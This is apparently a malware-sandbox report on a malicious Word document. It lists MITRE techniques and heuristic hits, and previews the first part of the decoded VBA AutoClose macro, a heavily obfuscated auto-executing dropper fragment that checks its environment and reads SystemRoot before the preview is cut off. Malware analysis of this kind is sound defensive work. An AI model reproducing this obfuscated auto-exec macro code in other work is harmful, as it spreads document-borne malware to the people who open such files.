MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. High-severity heuristics indicate the presence of AutoOpen, AutoClose, and CreateObject calls, along with an auto-execution marker. The AutoClose macro is present and appears to be designed to execute code, likely to download and run a second-stage payload. The specific payload and its destination are obfuscated, preventing confident family attribution.
Heuristics 8
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 212433 bytes |
SHA-256: a8909501aa502819b6baf7edf55b8b1b062d8f14581055fcb6305f5ce99fcad7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoClose()
yfpufh = "ooogm"
ornutpxiem = -85 / 136
wj = -34263
fpxhevm = (Not wj)
uwmie61 = -139 + 56
ylupxq = "bbohma"
fxkqczaeye = -121 / 57
v = 10935
uea = -33141
weea = Not (v < uea)
puuokckrz = -134 + 38
ucp = -27289
oayi = (Not ucp)
oenkloeo = -112 - 89
yogya = "sfwcjoidjpf+"
mio = -13941
uou = (Not mio)
gk = -47620
x = (Not gk)
kx = 7384
l = (Not kx)
Dim turuunfy As String
turuunfy = -144 * 145
aeazqkay = -96 - 7
umekxevfyo = -12 / 179
kmwzkp = -16283
yu = (Not kmwzkp)
oeytqe = "$upekleoa"
aa = 40128
hsi = -40409
ui = Not (aa <= hsi)
agzzormu = -95 + 39
cyie = -176 - 8
mbnwxi = 8199
l = -23162
yori = Not (mbnwxi >= l)
E = 64191
vcjc = 19538
yoa = Not (E >= vcjc)
sojo = "zjzscyqyiuoi+$tsxxqxpmyioi"
uog = -713
pgwlyq9 = 60849
io = Not (uog > pgwlyq9)
ngcmrlv = "te"
eayodfrw = -3 / 43
mepo7 = -50524
jv = (Not mepo7)
uu = -49880
k = (Not uu)
wqsui = "mp"
ajtaoie = -151 + 60
a = 49085
ajf = (Not a)
chxmi = 22877
jr = -9842
gje = Not (chxmi >= jr)
szsgjpou = ngcmrlv & wqsui
yyou = -11863
E = 49224
rwuyu0 = Not (yyou <= E)
qmrtlmqlkibq = -6 + 46
xginjtf = -156 - 31
aejaooe = -63 + 133
staioa = "exruaeiyu+$i"
mttwgb2 = 61513
oeu = (Not mttwgb2)
lupc0 = -147 - 101
ulquxopo = -132 - 97
bxnbykwi = -91 + 20
ykpfuo = -1 + 130
igjedyy = -47 - 12
yy = 64057
y = 6834
joxk7 = Not (yy > y)
eiiclz = -165 + 110
mglco = "ghwbhgahk"
epzo = -154 * 121
ezrnux = -65 * 97
oeuou = -157 * 54
yupnym = "vgqcisawss90+$"
ouyhyrv = -169 / 104
iutqvp = -133 * 153
xc = -19776
aty = (Not xc)
bdeqsc = yfpufh & ylupxq & yogya & oeytqe & sojo & staioa & mglco & yupnym
qmektfr = -14023
i = (Not qmektfr)
tpushcx = 48295
gerr = (Not tpushcx)
dt = -60991
y = -49566
ffgf = Val(Application.MailSystem) Like Val(1)
aydv = Not (dt > y)
If ffgf Then
wkjokyuhte = Environ("Sys" & kvvmfy & "temRoot")
eae = -8305
End If
ucy = -46367
lqkho = Not (eae <= ucy)
eyzkob = -160 / 171
iavdg = -65964
l = 62714
l = Not (iavdg >= l)
ilmeuoi = -88 - 137
Dim oyucjeqf As String
oyucjeqf = -97 - 70
vyuefn52 = -150 / 51
ildbhuia40 = -152 * 50
ffeem = "xdyfrewojjay"
uo = -26566
y = (Not uo)
bwurqhc = -38216
a = -163
rty = Not (bwurqhc >= a)
jrygqsgca = -104 / 44
Dim eurkq, ieooo18 As String
eurkq = -147 + 96
hykdvmfo = "a+$zdtcf"
xrukbjigdi = -137 + 117
jliasiu = -1 + 81
qjauu81 = -91 / 40
ruogac = -145 - 92
oexxinci9 = "lqeydhqrrfbnnfv"
eui = 16233
a = (Not eui)
enpwrd = -123 + 149
gg = 6809
d = 43124
iwyr = Not (gg <= d)
rtscui = -92 / 44
ytcralczr5 = "bylz+$yifgbxoy"
sfsno = 20490
kzvvej = (Not sfsno)
akleurjf = -53 - 155
xkgiaya = "dacceoetj2+$e"
aioeuhtybx = -129 + 62
Dim ucyoyyy As Integer
ucyoyyy = -82 + 21
eqqpxegf = "oeooxf"
Dim rnpseftw05 As String
rnpseftw05 = -108 + 62
eoruhy = -75 / 134
okgyiera = -82 - 47
acbfpwy = "lujrxeos"
arfyii = -27 * 102
uetcqyoa = -85 / 71
d = 58063
yq = 22551
eacca = Not (d >= yq)
h = 61742
roam = 15366
uu = Not (h < roam)
s = 22503
n = (Not s)
wkjokyuhte = wkjokyuhte + "\sys"
you = -6660
oqdl94 = -25051
qdh = Not (you < oqdl94)
zaytlu = -5 - 77
eepq = -113 - 111
bqyoo = -97 - 35
aspaa = "yone+$nylfye"
dcdzo = -30 / 101
u = -44792
ymh = 34170
o = Not (u <= ymh)
yhhiuuapxnd = -118 + 69
uyoiqsa = -134 / 178
brsvywpn = "uyppf"
yy = 52541
tvxu04 = (Not yy)
ww = 6297
xfo = -35971
v = Not (ww < xfo)
ayqawf = -173 * 106
yucggipki = -165 + 89
badzqe = ffeem & hykdvmfo & oexxinci9 & ytcralczr5 & xkgiaya & eqqpxegf & acbfpwy & aspaa & brsvywpn
Dim ztwbaohi As String
ztwbaohi = -173 + 145
ab = 7309
lvzboo = -18407
ilg = Not (ab > lvzboo)
Dim cqweajj As String
cqweajj = -154 + 137
Dim almyg As String
almyg = -136 + 99
sgif03 = -131 + 61
mbpziux91 = "e
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.